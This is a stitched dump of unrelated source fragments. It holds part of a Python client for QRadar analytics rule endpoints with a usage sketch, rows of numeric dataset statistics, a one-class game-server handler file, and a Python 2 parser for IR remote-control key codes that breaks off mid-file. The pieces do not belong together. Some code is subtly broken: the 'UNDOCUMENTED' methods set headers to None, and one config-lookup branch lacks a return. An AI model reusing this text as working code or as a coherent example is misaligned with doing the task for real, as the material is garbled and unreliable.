return self._call('GET', function_endpoint, **kwargs)
def delete_rule_groups_by_group_id(self, group_id, **kwargs):
"""
DELETE /analytics/rule_groups/{group_id}
Deletes a rule group. To ensure safe deletion, a dependency check is carried out. This check might take some time. An asynchronous task is started to perform this check.
"""
function_endpoint = urljoin(self._baseurl, 'rule_groups/{group_id}'.format(group_id=group_id))
return self._call('DELETE', function_endpoint, response_type='text/plain', **kwargs)
@header_vars('Range')
@request_vars('filter', 'fields')
def get_rules(self, *, Range=None, filter=None, fields=None, **kwargs):
"""
GET /analytics/rules
Retrieves a list of rules.
"""
function_endpoint = urljoin(self._baseurl, 'rules')
return self._call('GET', function_endpoint, **kwargs)
@request_vars('fields')
def get_rules_rule_delete_tasks_by_task_id(self, task_id, *, fields=None, **kwargs):
"""
GET /analytics/rules/rule_delete_tasks/{task_id}
Retrieves the status of the rule delete task.
"""
function_endpoint = urljoin(self._baseurl, 'rules/rule_delete_tasks/{task_id}'.format(task_id=task_id))
return self._call('GET', function_endpoint, **kwargs)
@request_vars('fields')
def get_rules_rule_dependent_tasks_by_task_id(self, task_id, *, fields=None, **kwargs):
"""
GET /analytics/rules/rule_dependent_tasks/{task_id}
Retrieves the dependent rule task status.
"""
function_endpoint = urljoin(self._baseurl, 'rules/rule_dependent_tasks/{task_id}'.format(task_id=task_id))
return self._call('GET', function_endpoint, **kwargs)
@header_vars('fields')
def post_rules_rule_dependent_tasks_by_task_id(self, task_id, *, task, fields=None, **kwargs):
"""
POST /analytics/rules/rule_dependent_tasks/{task_id}
Cancels the dependent rule task.
"""
function_endpoint = urljoin(self._baseurl, 'rules/rule_dependent_tasks/{task_id}'.format(task_id=task_id))
return self._call('POST', function_endpoint, json=task, **kwargs)
@request_vars('fields')
def get_rules_rule_dependent_tasks_results_by_task_id(self, task_id, *, fields=None, **kwargs):
"""
GET /analytics/rules/rule_dependent_tasks/{task_id}/results
Retrieves the rule dependent task results.
"""
function_endpoint = urljoin(self._baseurl,
'rules/rule_dependent_tasks/{task_id}/results'.format(task_id=task_id))
return self._call('GET', function_endpoint, **kwargs)
@request_vars('fields')
def delete_rules_by_id(self, id, *, fields=None, **kwargs):
"""
DELETE /analytics/rules/{id}
Deletes the rule. To ensure safe deletion, a dependency check is carried out. This check might take some time. An asynchronous task is started to perform this check.
"""
function_endpoint = urljoin(self._baseurl, 'rules/{id}'.format(id=id))
return self._call('DELETE', function_endpoint, **kwargs)
@header_vars('fields')
def post_rules_by_id(self, id, *, rule, fields=None, **kwargs):
"""
POST /analytics/rules/{id}
Updates the rule owner or enabled/disabled only.
"""
function_endpoint = urljoin(self._baseurl, 'rules/{id}'.format(id=id))
return self._call('POST', function_endpoint, json=rule, **kwargs)
@request_vars('fields')
def get_rules_by_id(self, id, *, fields=None, **kwargs):
"""
GET /analytics/rules/{id}
Retrieves a rule.
"""
function_endpoint = urljoin(self._baseurl, 'rules/{id}'.format(id=id))
return self._call('GET', function_endpoint, **kwargs)
@request_vars('fields')
def get_rules_dependents_by_id(self, id, *, fields=None, **kwargs):
"""
GET /analytics/rules/{id}/dependents
Retrieves the objects that depend on the rule.
"""
function_endpoint = urljoin(self._baseurl, 'rules/{id}/dependents'.format(id=id))
return self._call('GET', function_endpoint, **kwargs)
@header_vars('Range')
@request_vars('sort', 'filter', 'fields')
def get_rules_with_data(self, *, sort=None, Range=None, filter=None, fields=None, **kwargs):
"""
GET /analytics/rules_with_data
Retrieves a list of rules.
UNDOCUMENTED
"""
headers = kwargs.get('headers', {}).update({'Allow-Hidden': True})
function_endpoint = urljoin(self._baseurl, 'rules_with_data')
return self._call('GET', function_endpoint, headers=headers, **kwargs)
@header_vars('fields')
def post_rules_with_data(self, *, rule, fields=None, **kwargs):
"""
POST /analytics/rules_with_data
Creates a CRE rule with supplied rule_data xml
UNDOCUMENTED
"""
headers = kwargs.get('headers', {}).update({'Allow-Hidden': True})
function_endpoint = urljoin(self._baseurl, 'rules_with_data')
return self._call('POST', function_endpoint, json=rule, headers=headers, **kwargs)
@header_vars('fields')
def post_rules_with_data_by_id(self, id, *, rule, fields=None, **kwargs):
"""
POST /analytics/rules_with_data/{id}
Updates a CRE rule with supplied rule_data xml
UNDOCUMENTED
"""
headers = kwargs.get('headers', {}).update({'Allow-Hidden': True})
function_endpoint = urljoin(self._baseurl, 'rules_with_data/{id}'.format(id=id))
return self._call('POST', function_endpoint, json=rule, headers=headers, **kwargs)
@request_vars('fields')
def get_rules_with_data_by_id(self, id, *, fields=None, **kwargs):
"""
GET /analytics/rules_with_data/{id}
Retrieves a rule.
UNDOCUMENTED
"""
headers = kwargs.get('headers', {}).update({'Allow-Hidden': True})
function_endpoint = urljoin(self._baseurl, 'rules_with_data/{id}'.format(id=id))
return self._call('GET', function_endpoint, headers=headers, **kwargs)
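A minimal, hypothetical sketch of how this endpoint group might be called directly; the console URL, the SEC token header, and the chosen fields are placeholder assumptions, not values from the source.
# Hypothetical usage of the Analytics endpoint group defined above.
# URL, auth header, and field list are placeholders.
from qradar4py.endpoints.analytics import Analytics

header = {'SEC': 'YOUR-API-TOKEN', 'Accept': 'application/json'}
analytics = Analytics('https://qradar.example.com/api/', header, verify=False)

# Retrieve the first ten rules, asking only for a few fields.
response = analytics.get_rules(Range='items=0-9', fields='id,name,enabled')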
| 47.036398
| 195
| 0.664847
| 2,962
| 24,553
| 5.218771
| 0.05233
| 0.107647
| 0.077371
| 0.090827
| 0.925023
| 0.905809
| 0.866283
| 0.836978
| 0.780373
| 0.72422
| 0
| 0.000466
| 0.21362
| 24,553
| 521
| 196
| 47.126679
| 0.800135
| 0.229381
| 0
| 0.64898
| 0
| 0
| 0.133906
| 0.071018
| 0
| 0
| 0
| 0
| 0
| 1
| 0.216327
| false
| 0
| 0.016327
| 0
| 0.453061
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cbdf34fdadfaa52a4cd800a4905f40b7b2ed9fe0
| 245
|
py
|
Python
|
handlers.py
|
anthill-gaming/game_controller
|
849ea700263d7724d7a66907e0961956940e6c64
|
[
"MIT"
] | null | null | null |
handlers.py
|
anthill-gaming/game_controller
|
849ea700263d7724d7a66907e0961956940e6c64
|
[
"MIT"
] | null | null | null |
handlers.py
|
anthill-gaming/game_controller
|
849ea700263d7724d7a66907e0961956940e6c64
|
[
"MIT"
] | null | null | null |
from anthill.framework.handlers.streaming.uploadfile import UploadFileStreamHandler
from anthill.platform.handlers import UserHandlerMixin
# noinspection PyAbstractClass
class DeployHandler(UploadFileStreamHandler, UserHandlerMixin):
pass
| 30.625
| 83
| 0.869388
| 21
| 245
| 10.142857
| 0.714286
| 0.103286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.085714
| 245
| 7
| 84
| 35
| 0.950893
| 0.114286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.25
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
1db48c064187b04295c4a0423d1fc0c14549fe93
| 33,506
|
py
|
Python
|
IM_test/app_lib/parseIrkey.py
|
joakimzhang/qa_study
|
ff8930e674d45c49bea4e130d14d73d17b090e48
|
[
"Apache-2.0"
] | null | null | null |
IM_test/app_lib/parseIrkey.py
|
joakimzhang/qa_study
|
ff8930e674d45c49bea4e130d14d73d17b090e48
|
[
"Apache-2.0"
] | null | null | null |
IM_test/app_lib/parseIrkey.py
|
joakimzhang/qa_study
|
ff8930e674d45c49bea4e130d14d73d17b090e48
|
[
"Apache-2.0"
] | null | null | null |
r'''Parse configuration file.
Functions:
-- readConfigFile ()
'''
import ConfigParser
import os,sys
import globalVariable
class ParseIrkey(object):
def __init__(self):
self.irkey_file = 'irKey.cfg'
if globalVariable.serial_config['target_type'] == 'libra2':
self.section = 'Libra2'
elif globalVariable.serial_config['target_type'] == 'librasd':
self.section = 'Gospell'
elif globalVariable.serial_config['target_type'] == 'Sunplus':
self.section = 'Sunplus'
elif globalVariable.serial_config['target_type'] == 'SaiKeDa':
self.section = 'SaiKeDa'
self.irkey_abspath = os.path.join(os.getcwd(),
'caseInfo',
'irkey',
self.irkey_file)
self.config = ConfigParser.ConfigParser()
try:
self.cfg_fp = open(self.irkey_abspath,"r")
self.config.readfp(self.cfg_fp)
except Exception,e:
print e
sys.exit(-1)
self.insertIrk2Map(self.section)
def parseConfigItem(self, section, item, item_type='get'):
if self.config.has_section(section):
if self.config.has_option(section, item):
return getattr(self.config, item_type)(section, item)
else:
return False
else:
False
def insertIrk2Map(self, section):
if section=='Gospell':
sys_code = self.parseConfigItem(self.section,'System').split(':')[0]
power_code = self.parseConfigItem(self.section,'POWER').split(':')[0]
code_1 = self.parseConfigItem(self.section,'1').split(':')[0]
code_2 = self.parseConfigItem(self.section,'2').split(':')[0]
code_3 = self.parseConfigItem(self.section,'3').split(':')[0]
code_4 = self.parseConfigItem(self.section,'4').split(':')[0]
code_5 = self.parseConfigItem(self.section,'5').split(':')[0]
code_6 = self.parseConfigItem(self.section,'6').split(':')[0]
code_7 = self.parseConfigItem(self.section,'7').split(':')[0]
code_8 = self.parseConfigItem(self.section,'8').split(':')[0]
code_9 = self.parseConfigItem(self.section,'9').split(':')[0]
code_0 = self.parseConfigItem(self.section,'0').split(':')[0]
#pgup_code = self.parseConfigItem(self.section,'PgUp+').split(':')[0]
#pgdn_code = self.parseConfigItem(self.section,'PgDn-').split(':')[0]
pgup_code = self.parseConfigItem(self.section,'PG+').split(':')[0]
pgdn_code = self.parseConfigItem(self.section,'PG-').split(':')[0]
menu_code = self.parseConfigItem(self.section,'MENU').split(':')[0]
exit_code = self.parseConfigItem(self.section,'EXIT').split(':')[0]
up_code = self.parseConfigItem(self.section,'UP').split(':')[0]
dn_code = self.parseConfigItem(self.section,'DOWN').split(':')[0]
left_code = self.parseConfigItem(self.section,'LEFT').split(':')[0]
right_code = self.parseConfigItem(self.section,'RIGHT').split(':')[0]
ok_code = self.parseConfigItem(self.section,'OK').split(':')[0]
info_code = self.parseConfigItem(self.section,'Info').split(':')[0]
#dvr_code = self.parseConfigItem(self.section,'DVR').split(':')[0]
#vol_plus_code = self.parseConfigItem(self.section,'VOL+').split(':')[0]
#vol_minus_code = self.parseConfigItem(self.section,'VOL-').split(':')[0]
#list_code = self.parseConfigItem(self.section,'LIST').split(':')[0]
#back_code = self.parseConfigItem(self.section,'BACK').split(':')[0]
red_code = self.parseConfigItem(self.section,'RED').split(':')[0]
green_code = self.parseConfigItem(self.section,'GREEN').split(':')[0]
yellow_code = self.parseConfigItem(self.section,'YELLOW').split(':')[0]
blue_code = self.parseConfigItem(self.section,'BLUE').split(':')[0]
#ch_plus_code = self.parseConfigItem(self.section,'CH+').split(':')[0]
#ch_minus_code = self.parseConfigItem(self.section,'CH-').split(':')[0]
epg_code = self.parseConfigItem(self.section,'EPG').split(':')[0]
#time_code = self.parseConfigItem(self.section,'TIMER').split(':')[0]
#media_code = self.parseConfigItem(self.section,'MEDIA').split(':')[0]
#reclist_code = self.parseConfigItem(self.section,'RECLIST').split(':')[0]
audio_code = self.parseConfigItem(self.section,'AUDIO').split(':')[0]
tv_radio_code = self.parseConfigItem(self.section,'TV/R').split(':')[0]
mute_code = self.parseConfigItem(self.section,'MUTE').split(':')[0]
#subt_code = self.parseConfigItem(self.section,'SUBT').split(':')[0]
#vformat_code = self.parseConfigItem(self.section,'V.Format').split(':')[0]
zoom_code = self.parseConfigItem(self.section,'ZOOM').split(':')[0]
ttx_code = self.parseConfigItem(self.section,'TTX').split(':')[0]
pav_code = self.parseConfigItem(self.section,'FAV').split(':')[0]
find_code = self.parseConfigItem(self.section,'FIND').split(':')[0]
play_code = self.parseConfigItem(self.section,'REPLAY&START').split(':')[0]
pause_code = self.parseConfigItem(self.section,'PAUSE').split(':')[0]
stop_code = self.parseConfigItem(self.section,'STOP').split(':')[0]
sleep_code = self.parseConfigItem(self.section,'IGNORE').split(':')[0]
switch_code = self.parseConfigItem(self.section,'SWITCH').split(':')[0]
start_code = self.parseConfigItem(self.section,'START').split(':')[0]
single_code = self.parseConfigItem(self.section,'SINGLE').split(':')[0]
globalVariable.IRK_MAP['System'] = int(sys_code.strip(), 16)
globalVariable.IRK_MAP['POWER'] = int(power_code.strip(), 16)
globalVariable.IRK_MAP['1'] = int(code_1.strip(), 16)
globalVariable.IRK_MAP['2'] = int(code_2.strip(), 16)
globalVariable.IRK_MAP['3'] = int(code_3.strip(), 16)
globalVariable.IRK_MAP['4'] = int(code_4.strip(), 16)
globalVariable.IRK_MAP['5'] = int(code_5.strip(), 16)
globalVariable.IRK_MAP['6'] = int(code_6.strip(), 16)
globalVariable.IRK_MAP['7'] = int(code_7.strip(), 16)
globalVariable.IRK_MAP['8'] = int(code_8.strip(), 16)
globalVariable.IRK_MAP['9'] = int(code_9.strip(), 16)
globalVariable.IRK_MAP['0'] = int(code_0.strip(), 16)
globalVariable.IRK_MAP['PG+'] = int(pgup_code.strip(), 16)
globalVariable.IRK_MAP['PG-'] = int(pgdn_code.strip(), 16)
globalVariable.IRK_MAP['MENU'] = int(menu_code.strip(), 16)
globalVariable.IRK_MAP['EXIT'] = int(exit_code.strip(), 16)
globalVariable.IRK_MAP['UP'] = int(up_code.strip(), 16)
globalVariable.IRK_MAP['DOWN'] = int(dn_code.strip(), 16)
globalVariable.IRK_MAP['LEFT'] = int(left_code.strip(), 16)
globalVariable.IRK_MAP['RIGHT'] = int(right_code.strip(), 16)
globalVariable.IRK_MAP['OK'] = int(ok_code.strip(), 16)
globalVariable.IRK_MAP['INFO'] = int(info_code.strip(), 16)
#globalVariable.IRK_MAP['DVR'] = int(dvr_code.strip(), 16)
#globalVariable.IRK_MAP['VOL+'] = int(vol_plus_code.strip(), 16)
#globalVariable.IRK_MAP['VOL-'] = int(vol_minus_code.strip(), 16)
#globalVariable.IRK_MAP['LIST'] = int(list_code.strip(), 16)
#globalVariable.IRK_MAP['BACK'] = int(back_code.strip(), 16)
globalVariable.IRK_MAP['RED'] = int(red_code.strip(), 16)
globalVariable.IRK_MAP['GREEN'] = int(green_code.strip(), 16)
globalVariable.IRK_MAP['YELLOW'] = int(yellow_code.strip(), 16)
globalVariable.IRK_MAP['BLUE'] = int(blue_code.strip(), 16)
#globalVariable.IRK_MAP['CH+'] = int(ch_plus_code.strip(), 16)
#globalVariable.IRK_MAP['CH-'] = int(ch_minus_code.strip(), 16)
globalVariable.IRK_MAP['EPG'] = int(epg_code.strip(), 16)
#globalVariable.IRK_MAP['TIMER'] = int(time_code.strip(), 16)
#globalVariable.IRK_MAP['MEDIA'] = int(media_code.strip(), 16)
#globalVariable.IRK_MAP['RECLIST'] = int(reclist_code.strip(), 16)
globalVariable.IRK_MAP['AUDIO'] = int(audio_code.strip(), 16)
globalVariable.IRK_MAP['TV/R'] = int(tv_radio_code.strip(), 16)
globalVariable.IRK_MAP['MUTE'] = int(mute_code.strip(), 16)
#globalVariable.IRK_MAP['SUBT'] = int(subt_code.strip(), 16)
#globalVariable.IRK_MAP['V.Format'] = int(vformat_code.strip(), 16)
globalVariable.IRK_MAP['ZOOM'] = int(zoom_code.strip(), 16)
globalVariable.IRK_MAP['TTX'] = int(ttx_code.strip(), 16)
globalVariable.IRK_MAP['FAV'] = int(pav_code.strip(), 16)
globalVariable.IRK_MAP['FIND'] = int(find_code.strip(), 16)
globalVariable.IRK_MAP['REPLAY&START'] = int(play_code.strip(), 16)
globalVariable.IRK_MAP['PAUSE'] = int(pause_code.strip(), 16)
globalVariable.IRK_MAP['STOP'] = int(stop_code.strip(), 16)
globalVariable.IRK_MAP['IGNORE'] = int(sleep_code.strip(), 16)
globalVariable.IRK_MAP['SWITCH'] = int(switch_code.strip(), 16)
globalVariable.IRK_MAP['START'] = int(start_code.strip(), 16)
globalVariable.IRK_MAP['SINGLE'] = int(single_code.strip(), 16)
#print globalVariable.IRK_MAP['System']
elif section=='Libra2':
sys_code = self.parseConfigItem(self.section,'System').split(':')[0]
power_code = self.parseConfigItem(self.section,'POWER').split(':')[0]
code_1 = self.parseConfigItem(self.section,'1').split(':')[0]
code_2 = self.parseConfigItem(self.section,'2').split(':')[0]
code_3 = self.parseConfigItem(self.section,'3').split(':')[0]
code_4 = self.parseConfigItem(self.section,'4').split(':')[0]
code_5 = self.parseConfigItem(self.section,'5').split(':')[0]
code_6 = self.parseConfigItem(self.section,'6').split(':')[0]
code_7 = self.parseConfigItem(self.section,'7').split(':')[0]
code_8 = self.parseConfigItem(self.section,'8').split(':')[0]
code_9 = self.parseConfigItem(self.section,'9').split(':')[0]
code_0 = self.parseConfigItem(self.section,'0').split(':')[0]
pgup_code = self.parseConfigItem(self.section,'PgUp+').split(':')[0]
pgdn_code = self.parseConfigItem(self.section,'PgDn-').split(':')[0]
menu_code = self.parseConfigItem(self.section,'MENU').split(':')[0]
exit_code = self.parseConfigItem(self.section,'EXIT').split(':')[0]
up_code = self.parseConfigItem(self.section,'UP').split(':')[0]
dn_code = self.parseConfigItem(self.section,'DOWN').split(':')[0]
left_code = self.parseConfigItem(self.section,'LEFT').split(':')[0]
right_code = self.parseConfigItem(self.section,'RIGHT').split(':')[0]
ok_code = self.parseConfigItem(self.section,'OK').split(':')[0]
info_code = self.parseConfigItem(self.section,'Info').split(':')[0]
dvr_code = self.parseConfigItem(self.section,'DVR').split(':')[0]
vol_plus_code = self.parseConfigItem(self.section,'VOL+').split(':')[0]
vol_minus_code = self.parseConfigItem(self.section,'VOL-').split(':')[0]
list_code = self.parseConfigItem(self.section,'LIST').split(':')[0]
back_code = self.parseConfigItem(self.section,'BACK').split(':')[0]
red_code = self.parseConfigItem(self.section,'RED').split(':')[0]
green_code = self.parseConfigItem(self.section,'GREEN').split(':')[0]
yellow_code = self.parseConfigItem(self.section,'YELLOW').split(':')[0]
blue_code = self.parseConfigItem(self.section,'BLUE').split(':')[0]
ch_plus_code = self.parseConfigItem(self.section,'CH+').split(':')[0]
ch_minus_code = self.parseConfigItem(self.section,'CH-').split(':')[0]
epg_code = self.parseConfigItem(self.section,'EPG').split(':')[0]
time_code = self.parseConfigItem(self.section,'TIMER').split(':')[0]
media_code = self.parseConfigItem(self.section,'MEDIA').split(':')[0]
reclist_code = self.parseConfigItem(self.section,'RECLIST').split(':')[0]
audio_code = self.parseConfigItem(self.section,'AUDIO').split(':')[0]
tv_radio_code = self.parseConfigItem(self.section,'TV/RADIO').split(':')[0]
mute_code = self.parseConfigItem(self.section,'MUTE').split(':')[0]
subt_code = self.parseConfigItem(self.section,'SUBT').split(':')[0]
vformat_code = self.parseConfigItem(self.section,'V.Format').split(':')[0]
zoom_code = self.parseConfigItem(self.section,'ZOOM').split(':')[0]
ttx_code = self.parseConfigItem(self.section,'TTX').split(':')[0]
pav_code = self.parseConfigItem(self.section,'FAV').split(':')[0]
find_code = self.parseConfigItem(self.section,'FIND').split(':')[0]
play_code = self.parseConfigItem(self.section,'PLAY').split(':')[0]
pause_code = self.parseConfigItem(self.section,'PAUSE').split(':')[0]
stop_code = self.parseConfigItem(self.section,'STOP').split(':')[0]
qback_code = self.parseConfigItem(self.section,'QBACK').split(':')[0]
qplay_code = self.parseConfigItem(self.section,'QPLAY').split(':')[0]
rpoint_code = self.parseConfigItem(self.section,'RPoint').split(':')[0]
bstart_code = self.parseConfigItem(self.section,'BSTART').split(':')[0]
toend_code = self.parseConfigItem(self.section,'ToEND').split(':')[0]
opt_code = self.parseConfigItem(self.section,'OPT').split(':')[0]
sleep_code = self.parseConfigItem(self.section,'SLEEP').split(':')[0]
dely_code = self.parseConfigItem(self.section,'DELAY').split(':')[0]
globalVariable.IRK_MAP['System'] = int(sys_code.strip(), 16)
globalVariable.IRK_MAP['POWER'] = int(power_code.strip(), 16)
globalVariable.IRK_MAP['1'] = int(code_1.strip(), 16)
globalVariable.IRK_MAP['2'] = int(code_2.strip(), 16)
globalVariable.IRK_MAP['3'] = int(code_3.strip(), 16)
globalVariable.IRK_MAP['4'] = int(code_4.strip(), 16)
globalVariable.IRK_MAP['5'] = int(code_5.strip(), 16)
globalVariable.IRK_MAP['6'] = int(code_6.strip(), 16)
globalVariable.IRK_MAP['7'] = int(code_7.strip(), 16)
globalVariable.IRK_MAP['8'] = int(code_8.strip(), 16)
globalVariable.IRK_MAP['9'] = int(code_9.strip(), 16)
globalVariable.IRK_MAP['0'] = int(code_0.strip(), 16)
globalVariable.IRK_MAP['PgUp+'] = int(pgup_code.strip(), 16)
globalVariable.IRK_MAP['PgDn-'] = int(pgdn_code.strip(), 16)
globalVariable.IRK_MAP['MENU'] = int(menu_code.strip(), 16)
globalVariable.IRK_MAP['EXIT'] = int(exit_code.strip(), 16)
globalVariable.IRK_MAP['UP'] = int(up_code.strip(), 16)
globalVariable.IRK_MAP['DOWN'] = int(dn_code.strip(), 16)
globalVariable.IRK_MAP['LEFT'] = int(left_code.strip(), 16)
globalVariable.IRK_MAP['RIGHT'] = int(right_code.strip(), 16)
globalVariable.IRK_MAP['OK'] = int(ok_code.strip(), 16)
globalVariable.IRK_MAP['Info'] = int(info_code.strip(), 16)
globalVariable.IRK_MAP['DVR'] = int(dvr_code.strip(), 16)
globalVariable.IRK_MAP['VOL+'] = int(vol_plus_code.strip(), 16)
globalVariable.IRK_MAP['VOL-'] = int(vol_minus_code.strip(), 16)
globalVariable.IRK_MAP['LIST'] = int(list_code.strip(), 16)
globalVariable.IRK_MAP['BACK'] = int(back_code.strip(), 16)
globalVariable.IRK_MAP['RED'] = int(red_code.strip(), 16)
globalVariable.IRK_MAP['GREEN'] = int(green_code.strip(), 16)
globalVariable.IRK_MAP['YELLOW'] = int(yellow_code.strip(), 16)
globalVariable.IRK_MAP['BLUE'] = int(blue_code.strip(), 16)
globalVariable.IRK_MAP['CH+'] = int(ch_plus_code.strip(), 16)
globalVariable.IRK_MAP['CH-'] = int(ch_minus_code.strip(), 16)
globalVariable.IRK_MAP['EPG'] = int(epg_code.strip(), 16)
globalVariable.IRK_MAP['TIMER'] = int(time_code.strip(), 16)
globalVariable.IRK_MAP['MEDIA'] = int(media_code.strip(), 16)
globalVariable.IRK_MAP['RECLIST']= int(reclist_code.strip(), 16)
globalVariable.IRK_MAP['AUDIO'] = int(audio_code.strip(), 16)
globalVariable.IRK_MAP['TV/RADIO']= int(tv_radio_code.strip(), 16)
globalVariable.IRK_MAP['MUTE'] = int(mute_code.strip(), 16)
globalVariable.IRK_MAP['SUBT'] = int(subt_code.strip(), 16)
globalVariable.IRK_MAP['V.Format'] = int(vformat_code.strip(), 16)
globalVariable.IRK_MAP['ZOOM'] = int(zoom_code.strip(), 16)
globalVariable.IRK_MAP['TTX'] = int(ttx_code.strip(), 16)
globalVariable.IRK_MAP['FAV'] = int(pav_code.strip(), 16)
globalVariable.IRK_MAP['FIND'] = int(find_code.strip(), 16)
globalVariable.IRK_MAP['PLAY'] = int(play_code.strip(), 16)
globalVariable.IRK_MAP['PAUSE'] = int(pause_code.strip(), 16)
globalVariable.IRK_MAP['STOP'] = int(stop_code.strip(), 16)
globalVariable.IRK_MAP['QBACK'] = int(qback_code.strip(), 16)
globalVariable.IRK_MAP['QPLAY'] = int(qplay_code.strip(), 16)
globalVariable.IRK_MAP['RPoint'] = int(rpoint_code.strip(), 16)
globalVariable.IRK_MAP['BSTART'] = int(bstart_code.strip(), 16)
globalVariable.IRK_MAP['ToEND'] = int(toend_code.strip(), 16)
globalVariable.IRK_MAP['OPT'] = int(opt_code.strip(), 16)
globalVariable.IRK_MAP['SLEEP'] = int(sleep_code.strip(), 16)
globalVariable.IRK_MAP['DELAY'] = int(dely_code.strip(), 16)
#print globalVariable.IRK_MAP['System']
elif section=='Sunplus':
sys_code = self.parseConfigItem(self.section,'System').split(':')[0]
power_code = self.parseConfigItem(self.section,'POWER').split(':')[0]
code_1 = self.parseConfigItem(self.section,'1').split(':')[0]
code_2 = self.parseConfigItem(self.section,'2').split(':')[0]
code_3 = self.parseConfigItem(self.section,'3').split(':')[0]
code_4 = self.parseConfigItem(self.section,'4').split(':')[0]
code_5 = self.parseConfigItem(self.section,'5').split(':')[0]
code_6 = self.parseConfigItem(self.section,'6').split(':')[0]
code_7 = self.parseConfigItem(self.section,'7').split(':')[0]
code_8 = self.parseConfigItem(self.section,'8').split(':')[0]
code_9 = self.parseConfigItem(self.section,'9').split(':')[0]
code_0 = self.parseConfigItem(self.section,'0').split(':')[0]
pgup_code = self.parseConfigItem(self.section,'>>|').split(':')[0]
pgdn_code = self.parseConfigItem(self.section,'|<<').split(':')[0]
menu_code = self.parseConfigItem(self.section,'MENU').split(':')[0]
exit_code = self.parseConfigItem(self.section,'EXIT').split(':')[0]
up_code = self.parseConfigItem(self.section,'UP').split(':')[0]
dn_code = self.parseConfigItem(self.section,'DOWN').split(':')[0]
left_code = self.parseConfigItem(self.section,'LEFT').split(':')[0]
right_code = self.parseConfigItem(self.section,'RIGHT').split(':')[0]
ok_code = self.parseConfigItem(self.section,'OK').split(':')[0]
info_code = self.parseConfigItem(self.section,'INFO').split(':')[0]
dvr_code = self.parseConfigItem(self.section,'SAT').split(':')[0]
#vol_plus_code = self.parseConfigItem(self.section,'VOL+').split(':')[0]
#vol_minus_code = self.parseConfigItem(self.section,'VOL-').split(':')[0]
#list_code = self.parseConfigItem(self.section,'LIST').split(':')[0]
back_code = self.parseConfigItem(self.section,'RECALL').split(':')[0]
red_code = self.parseConfigItem(self.section,'RED').split(':')[0]
green_code = self.parseConfigItem(self.section,'GREEN').split(':')[0]
yellow_code = self.parseConfigItem(self.section,'YELLOW').split(':')[0]
blue_code = self.parseConfigItem(self.section,'BLUE').split(':')[0]
#ch_plus_code = self.parseConfigItem(self.section,'CH+').split(':')[0]
#ch_minus_code = self.parseConfigItem(self.section,'CH-').split(':')[0]
epg_code = self.parseConfigItem(self.section,'EPG').split(':')[0]
time_code = self.parseConfigItem(self.section,'TIMER').split(':')[0]
media_code = self.parseConfigItem(self.section,'SOURCE').split(':')[0]
reclist_code = self.parseConfigItem(self.section,'FILELIST').split(':')[0]
audio_code = self.parseConfigItem(self.section,'AUDIO').split(':')[0]
tv_radio_code = self.parseConfigItem(self.section,'TV/R').split(':')[0]
mute_code = self.parseConfigItem(self.section,'MUTE').split(':')[0]
subt_code = self.parseConfigItem(self.section,'SUB').split(':')[0]
#vformat_code = self.parseConfigItem(self.section,'V.Format').split(':')[0]
zoom_code = self.parseConfigItem(self.section,'ZOOM').split(':')[0]
ttx_code = self.parseConfigItem(self.section,'TTX/CC').split(':')[0]
pav_code = self.parseConfigItem(self.section,'FAV').split(':')[0]
#find_code = self.parseConfigItem(self.section,'FIND').split(':')[0]
play_code = self.parseConfigItem(self.section,'Play').split(':')[0]
pause_code = self.parseConfigItem(self.section,'Pause').split(':')[0]
stop_code = self.parseConfigItem(self.section,'Stop').split(':')[0]
qback_code = self.parseConfigItem(self.section,'<<').split(':')[0]
qplay_code = self.parseConfigItem(self.section,'>>').split(':')[0]
rpoint_code = self.parseConfigItem(self.section,'Rec').split(':')[0]
#bstart_code = self.parseConfigItem(self.section,'BSTART').split(':')[0]
globalVariable.IRK_MAP['System'] = int(sys_code.strip(), 16)
globalVariable.IRK_MAP['POWER'] = int(power_code.strip(), 16)
globalVariable.IRK_MAP['1'] = int(code_1.strip(), 16)
globalVariable.IRK_MAP['2'] = int(code_2.strip(), 16)
globalVariable.IRK_MAP['3'] = int(code_3.strip(), 16)
globalVariable.IRK_MAP['4'] = int(code_4.strip(), 16)
globalVariable.IRK_MAP['5'] = int(code_5.strip(), 16)
globalVariable.IRK_MAP['6'] = int(code_6.strip(), 16)
globalVariable.IRK_MAP['7'] = int(code_7.strip(), 16)
globalVariable.IRK_MAP['8'] = int(code_8.strip(), 16)
globalVariable.IRK_MAP['9'] = int(code_9.strip(), 16)
globalVariable.IRK_MAP['0'] = int(code_0.strip(), 16)
globalVariable.IRK_MAP['>>|'] = int(pgup_code.strip(), 16)
globalVariable.IRK_MAP['|<<'] = int(pgdn_code.strip(), 16)
globalVariable.IRK_MAP['MENU'] = int(menu_code.strip(), 16)
globalVariable.IRK_MAP['EXIT'] = int(exit_code.strip(), 16)
globalVariable.IRK_MAP['UP'] = int(up_code.strip(), 16)
globalVariable.IRK_MAP['DOWN'] = int(dn_code.strip(), 16)
globalVariable.IRK_MAP['LEFT'] = int(left_code.strip(), 16)
globalVariable.IRK_MAP['RIGHT'] = int(right_code.strip(), 16)
globalVariable.IRK_MAP['OK'] = int(ok_code.strip(), 16)
globalVariable.IRK_MAP['INFO'] = int(info_code.strip(), 16)
globalVariable.IRK_MAP['SAT'] = int(dvr_code.strip(), 16)
#globalVariable.IRK_MAP['VOL+'] = int(vol_plus_code.strip(), 16)
#globalVariable.IRK_MAP['VOL-'] = int(vol_minus_code.strip(), 16)
#globalVariable.IRK_MAP['LIST'] = int(list_code.strip(), 16)
globalVariable.IRK_MAP['RECALL'] = int(back_code.strip(), 16)
globalVariable.IRK_MAP['RED'] = int(red_code.strip(), 16)
globalVariable.IRK_MAP['GREEN'] = int(green_code.strip(), 16)
globalVariable.IRK_MAP['YELLOW'] = int(yellow_code.strip(), 16)
